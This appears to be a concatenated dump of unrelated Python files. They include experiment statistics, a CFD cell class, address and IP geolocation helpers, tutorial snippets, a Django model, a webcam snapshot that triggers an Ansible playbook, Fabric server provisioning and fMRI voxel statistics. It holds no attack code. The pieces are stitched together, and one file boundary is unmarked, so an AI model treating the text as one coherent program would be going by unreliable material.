    g_kr = kohren(f1, f2)
    y_aver = [round(sum(i) / len(i), 3) for i in y]
    print('\nThe average value of y:', y_aver)
    disp = s_kv(y, y_aver, n, m)
    print('The variance y:', disp)
    begin_time = time.perf_counter()
    gp = kohren_kr(y, y_aver, n, m)
    end_time = time.perf_counter()
    counted_kohren = end_time - begin_time
    print(f'gp = {gp}')
    if gp < g_kr:
        print('With a probability of {} dispersions are homogeneous.'.format(1 - q))
    else:
        print("It is necessary to increase the number of experiments")
        m += 1
        # NOTE(review): this restarts the whole experiment recursively and
        # then FALLS THROUGH to continue the current (inhomogeneous) run --
        # an early `return` after main(n, m) was probably intended; confirm.
        main(n, m)
    begin_time = time.perf_counter()
    # Drop the leading b0 column: student_kr/bs compute it separately.
    ts = student_kr(x[:, 1:], y, y_aver, n, m)
    end_time = time.perf_counter()
    counted_stud = end_time - begin_time
    print('\nStudent criterion:\n{}:'.format(ts))
    # Keep only statistically significant coefficients (t > table value).
    # NOTE(review): the comprehension variable shadows scipy's `t` import.
    res = [t for t in ts if t > t_student]
    final_k = [b[i] for i in range(len(ts)) if ts[i] in res]
    print('\nThe coefficients {} are statistically insignificant, so we exclude them from the equation.'.format([round(i, 3) for i in b if i not in final_k]))
    y_new = []
    for j in range(n):
        y_new.append(round(regression([x[j][i] for i in range(len(ts)) if ts[i] in res], final_k), 3))
    print('The value of y with coefficients {}: '.format(final_k))
    print(y_new)
    d = len(res)
    if d >= n:
        # No degrees of freedom left for the adequacy check.
        print('\nF4 <= 0')
        print('')
        return
    f4 = n - d
    begin_time = time.perf_counter()
    f_p = fisher_kr(y, y_aver, y_new, n, m, d)
    end_time = time.perf_counter()
    counted_fish = end_time - begin_time
    fisher = partial(f.ppf, q=0.95)
    f_t = fisher(dfn=f4, dfd=f3)
    print('\nFisher adequacy check')
    print('fp =', f_p)
    print('ft =', f_t)
    if f_p < f_t:
        print('The mathematical model is adequate to the experimental data')
    else:
        print('The mathematical model is inadequate to the experimental data')
    print('\nTime of statistical checks\nkohren - {} seconds\nstudent - {} seconds\nfisher - {} seconds'
          .format(counted_kohren, counted_stud, counted_fish))
def main(n, m):
    """Run one full planning-and-verification cycle for an n x m experiment."""
    factors, responses, factors_norm = plan_matrix(n, m)
    mean_responses = [round(sum(row) / len(row), 3) for row in responses]
    coeffs = coef_finding(factors, mean_responses)
    check(factors_norm, responses, coeffs, n, m)
# Variant 108 factor ranges (x1, x2, x3) and the response bounds derived
# from the averages of the range endpoints.
x_range = ((-5, 7), (-10, 3), (-7, 1))
x_aver_max = sum([x[1] for x in x_range]) / 3
x_aver_min = sum([x[0] for x in x_range]) / 3
y_min = 200 + int(x_aver_min)
y_max = 200 + int(x_aver_max)
# Run a 15-experiment plan with 3 replications per experiment.
main(15, 3)
|
import json
import csv
import pprint
# Pretty-printer kept for ad-hoc inspection of the parsed JSON.
pp = pprint.PrettyPrinter(indent=2, depth=8)

with open('college_data.json', 'r') as j:
    json_data = json.loads(j.read())
    #pp.pprint(json_data)

# Export one row per college: name, rank, acceptance rate.
# Bug fix: open the CSV with newline='' as the csv module requires;
# without it every row is followed by a blank line on Windows.
with open('college_data.csv', 'w', newline='') as c:
    csv_file = csv.writer(c)
    for data in json_data:
        csv_file.writerow([data['institution']['displayName'],
                           data['ranking']['displayRank'],
                           data['searchData']['acceptance-rate']['rawValue']])
|
"""
Base element of the solver. Each Cell object is a control volume and all the elementary operations
are performed at this level.
"""
import numpy as np
from qod_fvm import utils
utils.plt_style()
# Number of transported conservative variables (mass, momentum, energy).
N_TRANSPORT_EQ = 3


class Cell():
    """
    Control volume object: geometry, primitive/conservative state and flux
    vectors of one 1-D finite-volume cell.
    """

    def __init__(self):
        """Cell constructor: zero-initialize geometry, state and vectors."""
        # Cell size [m]
        self.dx = 0.
        # Cell position
        self.x_i = 0.
        # area
        self.diam = 0.
        self.area = 0.
        # Left face position
        self.x_f_0 = 0.
        # right face position
        self.x_f_1 = 0.
        # How does area and volume work?
        self.vol = 0.
        # Do we have trapezoidal elements?
        self.normal_l = -1.
        self.normal_r = 1.
        # variables
        self.pres = 0.
        self.temp = 0.
        self.e_int = 0.
        self.e_tot = 0.
        self.u = 0.
        # self.cp = 0.
        self.gamma = 0.
        self.r_gas = 0.
        # cons
        self.rho = 0.
        self.rho_u = 0.
        self.rho_E = 0.
        # index of vector
        self.idx_mass = 0
        self.idx_momentum = 1
        self.idx_energy = 2
        # cons_vec
        self.w_cons = np.zeros(N_TRANSPORT_EQ)
        # source term
        self.s_cons = np.zeros(N_TRANSPORT_EQ)
        # Flux vector
        # cell-center
        self.f_cons = np.zeros(N_TRANSPORT_EQ)
        # left
        self.flux_face_l = np.zeros(N_TRANSPORT_EQ)
        # right
        self.flux_face_r = np.zeros(N_TRANSPORT_EQ)
        self.n_transport_eq = N_TRANSPORT_EQ

    def compute_volume(self):
        """Compute and set the volume of the CV"""
        self.vol = self.area * self.dx

    def set_positions(self, x_minus_half, x_center, x_plus_half):
        """
        Initialize the position of the cell center, the faces and the size of the cell
        :param x_minus_half: [m]
        :param x_center: [m]
        :param x_plus_half: [m]
        """
        self.x_i = x_center
        self.x_f_0 = x_minus_half
        self.x_f_1 = x_plus_half
        self.dx = self.x_f_1 - self.x_f_0

    def get_T(self):
        """Get temperature [K]."""
        return self.temp

    def get_P(self):
        """Get pressure [Pa]."""
        return self.pres

    def get_u(self):
        """Get axial velocity [m/s]."""
        return self.u

    def get_rhou(self):
        """Get momentum density rho*u [kg.m-2.s-1]."""
        return self.rho_u

    def set_T(self, temperature):
        """Set the temperature [K]."""
        self.temp = temperature

    def set_P(self, pressure):
        """Set the pressure [Pa]."""
        self.pres = pressure

    def set_u(self, u):
        """Set the axial velocity [m/s]."""
        self.u = u

    def set_rho_from_TP(self, temp=None, pres=None):
        """
        Set the density [kg/m^3] from the temperature [K] and pressure [Pa]
        using the ideal gas law; arguments default to the stored T and P.
        """
        if not temp:
            temp = self.temp
        else:
            self.temp = temp
        if not pres:
            pres = self.pres
        else:
            self.pres = pres
        self.rho = pres / (self.r_gas * temp)

    def set_T_from_RP(self):
        """
        Set the temperature [K] from the density and the pressure (ideal gas law).
        """
        self.temp = self.pres / (self.r_gas * self.rho)

    def get_cp(self):
        """Specific heat capacity at constant pressure [J/K/kg]."""
        return self.gamma * self.get_cv()

    def get_cv(self):
        """Specific heat capacity at constant volume [J/K/kg]."""
        return self.r_gas / (self.gamma - 1.)

    def get_enthalpy(self):
        """
        Specific sensible enthalpy [J/kg] of a calorically perfect gas:

        .. math::
            h = c_p T
        """
        _h = self.get_cp() * self.temp
        return _h

    def get_internal_energy(self):
        """
        Internal specific energy [J/kg], computed from the enthalpy:

        .. math::
            e_{int} = h - \\frac{p}{\\rho}
        """
        _h = self.get_enthalpy()
        self.e_int = _h - self.pres / self.rho
        return self.e_int

    def get_total_energy(self):
        """
        Total specific energy [J/kg]:

        .. math::
            e_{tot} = e_{int} + \\frac{u^2}{2}
        """
        self.e_tot = self.get_internal_energy() + 0.5 * self.u ** 2
        return self.e_tot

    def get_sos(self):
        """
        Speed of sound [m/s], asserted positive:

        .. math::
            a = \\sqrt{\\gamma r T}
        """
        sos = np.sqrt(self.gamma * self.r_gas * self.temp)
        if self.temp < 0.:
            # Dump the full cell state to help diagnose the failure.
            print("Problem, negative speed of sound here:")
            output_fields = self.get_outfield()
            output_fields['x'] = self.x_i
            for key, value in output_fields.items():
                print("\t %s\t:\t%e" % (key, value))
        assert (sos > 0)
        return sos

    def update_cons_vec(self):
        """
        Fill the vector of conservative variables:
        U = [rho, rho*u, rho*E].
        """
        self.w_cons[self.idx_mass] = self.rho
        self.w_cons[self.idx_momentum] = self.rho_u
        self.w_cons[self.idx_energy] = self.rho_E

    def update_flux_vec(self):
        """
        Fill the vector of fluxes:
        F = [rho*u, rho*u^2 (+ p, currently disabled), u*(rho*E + p)].
        NOTE(review): the pressure term of the momentum flux is commented
        out -- confirm whether that is intentional.
        """
        self.f_cons[self.idx_mass] = self.rho_u
        self.f_cons[self.idx_momentum] = self.rho * self.u ** 2.# + self.pres
        self.f_cons[self.idx_energy] = self.u * (self.rho_E + self.pres)
        # self.f_cons[self.idx_energy] = self.u * (self.rho_E)
        # self.f_cons *= self.area

    def prim_to_cons(self):
        """
        Convert primitive variables to conservative variables.
        Careful, at this point the conservative vector isn't necessarily
        updated yet; call `update_vec_from_var` for that.
        """
        # Mass: no conversion needed, rho is both primitive and conservative.
        # Momentum
        self.rho_u = self.rho * self.u
        # Energy
        self.rho_E = self.rho * self.get_total_energy()

    def cons_to_prim(self):
        """
        Retrieve primitive variables from the conservative vector:

        .. math::
            p = \\rho (\\gamma - 1) \\left( E - \\frac{u^2}{2} \\right)
        """
        # mass
        self.rho = self.w_cons[0] #/ self.area
        # momentum
        self.u = self.w_cons[1] / self.rho #/ self.area
        # energy
        self.e_tot = self.w_cons[2] / self.rho # / self.area
        # pressure
        self.pres = (self.gamma - 1.) * self.rho * (self.e_tot - 0.5 * self.u ** 2.)
        # Temperature
        self.set_T_from_RP()
        # e_int
        _ = self.get_internal_energy()

    def update_vec_from_var(self):
        """
        Update conservative and flux vectors: convert primitives to
        conservatives, then fill both vectors.
        """
        self.prim_to_cons()
        self.update_cons_vec()
        self.update_flux_vec()

    def update_var_from_vec(self):
        """
        Converts conservative variables to primitives.
        """
        self.cons_to_prim()

    def get_outfield(self):
        """Return a dict of the cell's fields for output/debugging."""
        output_fields = {}
        output_fields['vel-x'] = self.get_u()
        output_fields['gamma'] = self.gamma
        output_fields['R_GAS'] = self.r_gas
        output_fields['rhoE'] = self.rho_E
        output_fields['rho'] = self.rho
        output_fields['P'] = self.pres
        output_fields['T'] = self.temp
        output_fields['rhou'] = self.rho_u
        output_fields['dx'] = self.dx
        # Bug fix: 'A' previously received the value of self.dx because the
        # shared temporary was assigned before self.area was read.
        output_fields['A'] = self.area
        return output_fields
|
import re
import socket
import struct as ip_struct
import traceback
from ctutil import iputil
def ipaddr_handle(ipv4, ipv6):
    """UDF entry point: convert an IPv4 string to its integer form.

    :param ipv4: IPv4 address string
    :param ipv6: IPv6 address string (currently unused)
    :return: integer encoding of the IPv4 address, or 0 if it is invalid
    """
    return iputil.ip2long(ipv4) if iputil.is_ipv4(ipv4) else 0
def address_split(address):
    """UDF entry point: split a full Chinese address into region parts.

    :param address: full address string
    :return: (province_name, city_name, district_name); missing parts are None
    """
    if not address:
        return None, None, None
    # Municipalities have no explicit province; duplicate the city name as a
    # pseudo-province ("北京..." -> "北京省北京...") so the generic split works.
    for municipality in ("北京", "上海", "天津", "重庆", "香港", "澳门"):
        if municipality in address:
            address = address.replace(municipality, municipality + "省" + municipality, 1)
            break
    # Administrative suffixes tried in order.  NOTE(review): '市' appears
    # twice in the original list -- presumably so a second city-level token
    # can still be consumed; kept as-is to preserve behavior.
    suffixes = ['省', '市', '特别行政区', '自治区',
                '自治县', '县区', '区县', '县', '区', '旗', '市']
    parts = []
    remainder = address
    for suffix in suffixes:
        if suffix in remainder:
            pieces = remainder.replace(suffix, ",", 1).split(',')
            parts.append(pieces[0])
            remainder = pieces[1]
    parts.append(remainder)
    if len(parts) >= 3:
        return parts[0], parts[1], parts[2]
    if len(parts) >= 2:
        return parts[0], parts[1], None
    return None, None, None
def areaname_handle(area_name):
    """Strip a single trailing administrative suffix (省/市/区/...) from a
    region name; names without a recognized suffix are returned unchanged."""
    if not area_name:
        return area_name
    for suffix in ('省', '市', '自治区', '自治县', '特别行政区', '县区', '区县', '县', '区', '旗'):
        if area_name.endswith(suffix):
            return area_name[:len(area_name) - len(suffix)]
    return area_name
def ip2area(iplong, ips_source):
    """Look up the area record for *iplong* in the sorted table *ips_source*.

    Each row is expected to look like [range_boundary, f1, f2, f3, f4]
    sorted ascending by column 0 -- TODO confirm the exact schema against
    the table producer.  Returns a 6-element list (4 area fields followed
    by two None placeholders), all None when nothing matches.
    """
    ips = ips_source

    def bst_search(array, index_l, index_r, value):
        # Recursive binary search over the boundary column (column 0).
        # NOTE(review): it effectively returns the first row whose boundary
        # is >= value (via the index_next probe) -- verify this matches the
        # table's range-encoding convention.
        if index_l == index_r:
            return None
        index = int((index_l + index_r) / 2)
        # Clamp neighbor probes to the array bounds.
        index_pre = index - 1 if index - 1 >= 0 else 0
        index_next = index + 1 if index + 1 <= len(array) - 1 else len(array) - 1
        if array[index][0] <= value:
            if array[index_next][0] >= value:
                return array[index_next]
            return bst_search(array, index + 1, index_r, value)
        else:
            if array[index_pre][0] <= value:
                return array[index]
            return bst_search(array, index_l, index, value)

    area_info = bst_search(ips, 0, len(ips) - 1, iplong)
    if area_info:
        return [
            area_info[1],
            area_info[2],
            area_info[3],
            area_info[4],
            None,
            None
        ]
    return [
        None,
        None,
        None,
        None,
        None,
        None
    ]
def handle(address, group_id, ipv4, ipv6, ips_source, region_source, group_source):
    '''Resolve (province, city, district) area info for one record.

    Resolution order: group-id lookup -> free-text address parsing against
    the region table -> IPv4 geolocation table -> all-None fallback.
    Returns a 6-element list: [province_code, province_name, city_code,
    city_name, district_code, district_name].
    '''
    # 1) Direct lookup by group id, accepted only when it carries a real
    #    (positive) city code.
    if group_id and group_id > 0:
        area_info = group_source.get(group_id)
        if area_info and area_info[2] and int(area_info[2]) > 0:
            return [
                area_info[0],
                area_info[1],
                area_info[2],
                area_info[3],
                area_info[4],
                area_info[5]
            ]
    # 2) Parse the address and match the region table: first with district,
    #    then falling back to province+city only.
    if address:
        region = region_source
        province_name, city_name, district_name = address_split(address)
        area_info = region.get("{}_{}_{}".format(
            province_name, city_name, district_name))
        if area_info:
            return [
                area_info["province_code"],
                area_info["province_name"],
                area_info["city_code"],
                area_info["city_name"],
                area_info["district_code"],
                area_info["district_name"]
            ]
        area_info = region.get("{}_{}".format(province_name, city_name))
        if area_info:
            return [
                area_info["province_code"],
                area_info["province_name"],
                area_info["city_code"],
                area_info["city_name"],
                None,
                None
            ]
    # 3) Fall back to the IP geolocation table.
    if isinstance(ipv4, str) and iputil.is_ipv4(ipv4):
        area_info = ip2area(iputil.ip2long(ipv4), ips_source)
        if area_info:
            return area_info
    return [
        None,
        None,
        None,
        None,
        None,
        None
    ]
|
import dog
# Demo for the dog module: create four Dog objects and call their tricks.
myDog = dog.Dog("rex", "superdog")
myDog.bark()
mySecondDog = dog.Dog("sebastian", "rollingdog")
myThirdDog = dog.Dog("jennifer", "sittingdog")
myFourthDog = dog.Dog("ophelia", "runningdog")
mySecondDog.rollover() #sebastian will roll over
myThirdDog.sit() #jennifer will sit
myFourthDog.run() #ophelia will run
print(" ")
# Changing the module-level greeting affects every subsequent bark() call.
dog.greeting = "woah!"
myDog.bark()
mySecondDog.bark()
myThirdDog.bark()
myFourthDog.bark()
|
#!/usr/bin/python3
# functions.py by Bill Weinman [http://bw.org/]
# This is an exercise file from Python 3 Essential Training on lynda.com
# Copyright 2010 The BearHeart Group, LLC
def main():
    """Demo entry point: print several values via testfunc."""
    testfunc(1,3,5,7,9)
# *args collects any number of optional positional arguments.
def testfunc(*args):
    """Print each argument followed by ", ", all on one line (no newline)."""
    if args:
        print(*args, sep=", ", end=", ")

if __name__ == "__main__": main()
|
class Square(object):
    """A square defined by its side length."""

    def __init__(self, length):
        self.length = length

    def __repr__(self):
        # Human-readable summary including the computed area.
        return 'Square with length {length} has area {area}'.format(
            length=self.length, area=self.square_area())

    def square_area(self):
        """Return the area (side length squared)."""
        return self.length * self.length
class SquareWithColor(Square):
    """A Square that additionally carries a color attribute."""

    def __init__(self, length, color):
        super(SquareWithColor, self).__init__(length)
        self.color = color
if __name__ == '__main__':
    # BUG FIX: the original used Python-2-only `print a` statements, which
    # are a SyntaxError on Python 3.  The call form below behaves the same
    # on both Python 2 (parenthesised expression) and Python 3.
    a = Square(5)
    print(a.square_area())
    print(a)
    b = SquareWithColor(4, 'red')
    print(b.square_area())
|
import numpy as np
from sklearn import cross_validation
from sklearn import datasets
from sklearn import svm

# NOTE(review): Python 2 print statements plus sklearn.cross_validation
# (removed in scikit-learn 0.20) -- this script targets an old py2 stack.

# Evaluate a linear SVM on the iris data set.
iris = datasets.load_iris()
#print iris.data.shape, iris.target.shape

# just one validation
X_train, X_test, y_train, y_test = cross_validation.train_test_split(
    iris.data, iris.target, test_size=0.4, random_state=0)
#print X_train.shape, y_train.shape
#print X_test.shape, y_test.shape
clf = svm.SVC(kernel='linear', C=1).fit(X_train, y_train)
print "Iris. One-validation accuracy: " + str(clf.score(X_test, y_test))

# iris 5-fold cross-validation
clf = svm.SVC(kernel='linear', C=1)
scores = cross_validation.cross_val_score(clf, iris.data, iris.target, cv=5)
print("Iris. 5-fold CV accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))

# Zoo data: comma-separated numeric table; target is the last column.
zoo = np.loadtxt("zoo.txt", delimiter=",")
# NOTE(review): shape[1]-2 drops the LAST TWO columns from the features
# while the target is only the last column -- confirm that is intended.
zoo_data = zoo[:,0:zoo.shape[1]-2]
zoo_target = zoo[:,zoo.shape[1]-1]

# zoo 5-fold cross-validation
clf = svm.SVC()
scores = cross_validation.cross_val_score(clf, zoo_data, zoo_target, cv=5)
print("Zoo. 5-fold CV accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 21 14:47:44 2021
Class requires numpy for functioning
@author: kondrate
"""
class MAXCUSUM:
    """Multivariate CUSUM-style change-point detector over 14 channels.

    The constructor learns a baseline mean/covariance from an initial
    14 x W sample; iterate() then updates the cumulative decision
    statistic for each new 14 x W window and reports a change point as
    soon as the statistic becomes positive.
    """

    def __init__(self, isample):
        # BUG FIX: the original module imported numpy only inside the
        # __main__ guard, so importing this class from another module
        # raised NameError on `np`.  Import locally to stay self-contained.
        import numpy as np
        # data chunk must be of size 14xW
        # W will be interpreted as moving window size
        self._counter = 1
        self._Si = 0
        self._mu = np.mean(isample, axis=1).reshape(14, 1)
        self._cov = np.cov(isample).reshape(14, 14)
        # Add small value to the main diagonal to avoid singularity
        np.fill_diagonal(self._cov, self._cov.diagonal() + 1e-10)
        self._w = isample.shape[1]
        # debug: history of decision-statistic values
        self._decs = [self._Si]
        # Direction vector `a` of the worst-case mean shift (shape (1, 14)).
        up = np.dot((-1 * self._mu).T, np.linalg.inv(self._cov))
        down = np.sqrt(np.dot(np.dot((-1 * self._mu).T, np.linalg.inv(self._cov)), -1 * self._mu))
        self._a = up / down

    def iterate(self, data_chunk):
        """Process one 14 x W window.

        Returns (estimated change index, decision history) on detection,
        otherwise (0, 0).
        """
        import numpy as np
        # data chunk must be of size 14xW
        self._counter += 1
        nmu = np.mean(data_chunk, axis=1).reshape(14, 1)
        # BUG FIX: D and Z were kept as (1, 1) arrays and combined via
        # np.max([Si + Z - 0.5*D, 0]) -- a ragged list that raises
        # ValueError on NumPy >= 1.24.  Reduce both to Python floats and
        # use the builtin max instead (same arithmetic).
        D = np.sqrt(np.dot(np.dot((-1 * self._mu).T, np.linalg.inv(self._cov)), -1 * self._mu)).item()
        Z = np.dot(self._a, nmu - self._mu).item()
        self._Si = max(self._Si + Z - 0.5 * D, 0)
        # debug
        self._decs.append(self._Si)
        if self._Si > 0:
            return self._counter + self._w, self._decs
        else:
            return 0, 0
if __name__ == "__main__":
    # Smoke test on one recorded baseline session.
    import numpy as np
    import pandas as pd
    import pickle
    import os
    import matplotlib.pyplot as plt

    folder='/Users/kondrate/nfs/Documents/TUT/MSThesis/Scripts/Data/Baseline/'
    file = 'JasmineTableBaseline1.mat.csv'
    table = pd.read_csv(folder + file)
    # 14 IMS channels -- NOTE(review): IMS_abs8 is deliberately(?) missing.
    needed_columns = 'IMS_abs1 IMS_abs2 IMS_abs3 IMS_abs4 IMS_abs5 IMS_abs6 IMS_abs7 IMS_abs9 IMS_abs10 IMS_abs11 IMS_abs12 IMS_abs13 IMS_abs14 IMS_abs15'.split(" ")
    table = table[needed_columns]
    tsims = table.to_numpy()
    ims = tsims
    # First-order differences between consecutive samples, transposed to 14 x (T-1).
    tsims = np.array([tsims[i + 1,:] - tsims[i,:] for i in range(tsims.shape[0]-1)]).T
    gt = pickle.load(open(os.path.join(folder, 'ground truth', file + '.pickle'), 'rb'))
    vpoints = [gt[key]['val'] for key in gt if key != 'state']
    #plt.plot(tsims[0,:])
    # Learn the baseline from the first 10 samples, then slide a window of 10.
    mc = MAXCUSUM(tsims[:,:10])
    for i in range(tsims.shape[1]):
        pt, decs = mc.iterate(tsims[:,i:i+10])
        if pt > 0:
            break
    print('Change point found at:',pt)
# Author:ambiguoustexture
# Date: 2020-02-04
# Print the first N lines of hightemp.txt (N read from stdin), with
# trailing whitespace stripped from each line.
src = 'hightemp.txt'
n = int(input('N: '))
with open(src) as text:
    shown = 0
    for line in text:
        if shown >= n:
            break
        print(line.rstrip())
        shown += 1
|
def add(x, y, z):
    """Return the sum x + y + z (left-associative)."""
    total = x + y
    total = total + z
    return total
def sub(x, y, z):
    """Return x - y - z (left-associative subtraction)."""
    remainder = x - y
    return remainder - z
def mul(x, y):
    """Return the product x * y."""
    product = x * y
    return product
def div(x, y):
    """Return x / y (true division; raises ZeroDivisionError when y == 0)."""
    quotient = x / y
    return quotient
|
from django.db import models
from mptt.models import MPTTModel
from django.contrib.auth.models import User
# Create your models here.
class Page(MPTTModel):
    """Hierarchical CMS page stored as a django-mptt tree node."""
    title = models.CharField(max_length=255)
    slug = models.SlugField(max_length=50)
    content = models.TextField()
    published = models.DateTimeField('Date published')
    # BUG FIX: auto_now and auto_now_add are mutually exclusive in Django;
    # auto_now=True alone already stamps the field on every save, including
    # creation, so the conflicting auto_now_add flag was dropped.  Also
    # fixed the 'Date upated' typo in the verbose name.
    updated = models.DateTimeField('Date updated', auto_now=True)
    author = models.ForeignKey(User)
    parent = models.ForeignKey('self', related_name='children', null=True, blank=True)

    def __unicode__(self):
        # Indent the title with one dash per tree level (mptt sets .level).
        return "%s %s" % ("-" * self.level, self.title)

    class Meta:
        db_table = 'juice_pages_page'
#mptt.register(Page)
|
#!/usr/bin/python36
import subprocess
import cv2

# Capture a single frame from the default webcam and save it as evidence
# of the event that triggered this script.
cap = cv2.VideoCapture(0)
ret, image = cap.read()
# NOTE(review): `ret` is never checked and `cap` is never released -- if
# the camera is unavailable, `image` is None and imwrite below will fail.
cv2.imwrite('/root/Udev_automation/defaulter.jpg' , image)
#cv2.imshow('hi' , image)
#cv2.waitKey()
cv2.destroyAllWindows()
# Run the follow-up Ansible playbook; its output is discarded.
subprocess.getoutput("ansible-playbook /root/Udev_automation/security.yml --vault-password-file=/root/Udev_automation/mypasswd")
|
import os
from fabric.api import task, run
from fabric.contrib import files
from fabtools import service, deb, require
from fabtools import user as fabuser
# Accounts provisioned on every host.
USERS = ['robert', 'chrzyki', 'bibiko']
# Configuration files touched by the setup tasks below.
SSHD_CFG = '/etc/ssh/sshd_config'
POSTFIX_CFG = '/etc/postfix/main.cf'
MUNIN_CFG = '/etc/munin/munin-node.conf'
# Base packages installed on every host.
PKGS = ['language-pack-en-base', 'postfix', 'libsasl2-modules', 'bsd-mailx']
def add_user(users):
    """Create each account (password 'changeme', bash shell) and attach its
    public key from ../ssh_key_<user>.pub when that file exists locally."""
    base_dir = os.path.dirname(__file__)
    for name in users:
        pubkey = os.path.join(base_dir, '../ssh_key_' + name + '.pub')
        if not fabuser.exists(name):
            fabuser.create(name, password='changeme', shell='/bin/bash')
        try:
            fabuser.modify(name, ssh_public_keys=pubkey)
        except FileNotFoundError:
            # No key file shipped for this user -- skip silently.
            pass
def add_user_to_sudo(users):
    """Place every account in *users* into the 'sudo' group."""
    for name in users:
        fabuser.modify(name, group='sudo')
def change_authentication_method(sshd_cfg):
    """Disable SSH password authentication and restart sshd.

    Flips the stock commented default '#PasswordAuthentication yes' to
    'PasswordAuthentication no' in *sshd_cfg*; only effective while the
    distribution's commented line is still present verbatim.
    """
    files.sed(sshd_cfg, '#PasswordAuthentication yes',
              'PasswordAuthentication no', use_sudo=True)
    service.restart('sshd')
def install_packages(pkgs, postfix_cfg):
    """Preseed debconf, install *pkgs*, and point postfix at this host.

    *postfix_cfg* is the path to postfix's main.cf, rewritten at the end so
    myhostname carries the host's gwdg.de name.
    """
    hostname = run('hostname')
    # BUG FIX: the original used a comma instead of the % operator, which
    # made destination_cfg a tuple
    # ('%s.clld.org, ...', (hostname, hostname)) rather than the formatted
    # string debconf expects.
    destination_cfg = '%s.clld.org, %s, localhost.localdomain, localhost' % (
        hostname, hostname)
    deb.preseed_package('postfix', {
        'postfix/main_mailer_type': ('select', 'Internet Site'),
        'postfix/mailname': ('string', hostname + '.clld.org'),
        'postfix/destinations': ('string', destination_cfg),
    })
    deb.install(pkgs)

    def fix_postfix_cfg():
        # hostname and postfix_cfg are taken from the enclosing scope.
        files.sed(postfix_cfg, 'myhostname = ', 'myhostname = '
                  + hostname + '.gwdg.de', use_sudo=True)

    fix_postfix_cfg()
def setup_munin_node(munin_cfg):
    """Install munin-node, create its service account, and set host_name.

    *munin_cfg* is the path to munin-node.conf; the stock commented
    'host_name localhost.localdomain' line is replaced with this host's
    clld.org name before the service is restarted.
    """
    hostname = run('hostname')
    key_path = os.path.join(os.path.dirname(__file__),
                            '../ssh_key_munin_node.pub')
    require.deb.packages(['munin-node'])
    require.users.user(
        'dlce-munin-node',
        shell='/bin/bash',
        system=True,
        ssh_public_keys=key_path)

    def fix_munin_cfg():
        # hostname and munin_cfg come from the enclosing scope.
        files.sed(munin_cfg, '#host_name localhost.localdomain',
                  'host_name ' + hostname + '.clld.org', use_sudo=True)

    fix_munin_cfg()
    service.restart('munin-node')
@task
def setup_server():
    """Fabric task: provision a fresh host end to end.

    Order matters: users and keys must exist before password logins are
    disabled, and packages are installed before the munin node is set up.
    """
    # TODO: Test mail setup (i.e. send test mail).
    # TODO: If a host is migrated, update SSH key on Munin master.
    add_user(USERS)
    add_user_to_sudo(USERS)
    change_authentication_method(SSHD_CFG)
    install_packages(PKGS, POSTFIX_CFG)
    setup_munin_node(MUNIN_CFG)
|
import nibabel as nib
import numpy as np
from scipy import stats
from numpy import ma
import scipy.special as special
from statsmodels.stats import multitest
import itertools
import os
from os.path import join as opj
# from nipype.interfaces import afni
import nibabel as nib
import json
import numpy as np
import matching
import pandas as pd
from multiprocessing import Pool
import statsmodels.api as sm
from statsmodels.sandbox.stats.multicomp import fdrcorrection0
from functools import partial
from multiprocessing import Pool
import multiprocessing.managers
from tqdm import tqdm
class MyManager(multiprocessing.managers.BaseManager):
    """Custom multiprocessing manager used to share numpy result arrays."""
    pass
# Expose np.zeros through the manager so worker processes can write into a
# shared array proxy.  NOTE(review): multiprocessing.managers.ArrayProxy is
# not a documented public attribute -- confirm it exists on the target
# Python version before relying on this.
MyManager.register('np_zeros', np.zeros, multiprocessing.managers.ArrayProxy)
def calc_score_stats(brain_npy_handle_list, pvals, tvals, coeff_vals, score_list, roi, input_coordinates):
    '''
    Worker: fit OLS (connectivity ~ const + score) at a single voxel.

    brain_npy_handle_list holds one 3-D connectivity volume per subject
    (already sliced to this ROI).  pvals/tvals/coeff_vals are shared
    arrays (manager proxies) receiving the p-value, t-value and slope of
    the score regressor at the voxel given by
    input_coordinates = (x, y, z, counter).  Returns nothing; results are
    written in place.
    '''
    x,y,z,counter = input_coordinates
    # print('Creating voxel connectivity vector of all subjects for coordinates: %s,%s,%s'%(x,y,z))
    # if counter % 100 == 0:
    #     print('Coordinate Counter: %s'%(counter))
    voxel_corr_subject_array = []
    for brain_npy in brain_npy_handle_list:
        voxel_corr_subject_array.append(brain_npy[x,y,z])
    Y = voxel_corr_subject_array
    X = sm.add_constant(score_list)
    # print('Length of Y is %s',len(Y))
    # print('Length of X is %s',len(X))
    # print('Fitting GLM')
    model = sm.OLS(Y,X).fit()
    # print('Done')
    # Index 1 = the score regressor (index 0 is the added constant).
    pvals[x,y,z] = model.pvalues[1]
    tvals[x,y,z] = model.tvalues[1]
    coeff_vals[x,y,z] = model.params[1]
    # print('coeff_vals for coordinate %s %s %s is %s'%(x,y,z,model.params[1]))
def count_voxel_stats(pvals_list, qvals_list, map_logp_list, map_logq_list):
    """Summarise voxelwise significance for one ROI.

    Returns a 14-tuple:
    (min_pval, min_qval, #p<0.1, #p<0.01, #p<0.05, #q<0.1, #q<0.01,
     #q<0.05, #|logq|>1.3, #|logq|>1, #|logq|>2, #|logp|>1.3, #|logp|>1,
     #|logp|>2) where logp/logq are the signed -log10 maps.
    """
    abs_logp = np.absolute(map_logp_list)
    abs_logq = np.absolute(map_logq_list)

    def _count(mask):
        # Number of True entries (same value as np.shape(np.where(mask))[1]).
        return np.count_nonzero(mask)

    min_pval = np.min(pvals_list)
    min_qval = np.min(qvals_list)

    # Counts at the conventional significance thresholds.
    p_lt_point_1 = _count(pvals_list < 0.1)
    p_lt_point_01 = _count(pvals_list < 0.01)
    p_lt_point_05 = _count(pvals_list < 0.05)
    q_lt_point_1 = _count(qvals_list < 0.1)
    q_lt_point_01 = _count(qvals_list < 0.01)
    q_lt_point_05 = _count(qvals_list < 0.05)

    # |sign(coeff) * -log10(q)| thresholds (1.3 ~ p=0.05, 1 ~ 0.1, 2 ~ 0.01).
    logq_gt_1point3 = _count(abs_logq > 1.3)
    logq_gt_1 = _count(abs_logq > 1)
    logq_gt_2 = _count(abs_logq > 2)
    logp_gt_1point3 = _count(abs_logp > 1.3)
    logp_gt_1 = _count(abs_logp > 1)
    logp_gt_2 = _count(abs_logp > 2)

    return (min_pval, min_qval, p_lt_point_1, p_lt_point_01, p_lt_point_05,
            q_lt_point_1, q_lt_point_01, q_lt_point_05, logq_gt_1point3,
            logq_gt_1, logq_gt_2, logp_gt_1point3, logp_gt_1, logp_gt_2)
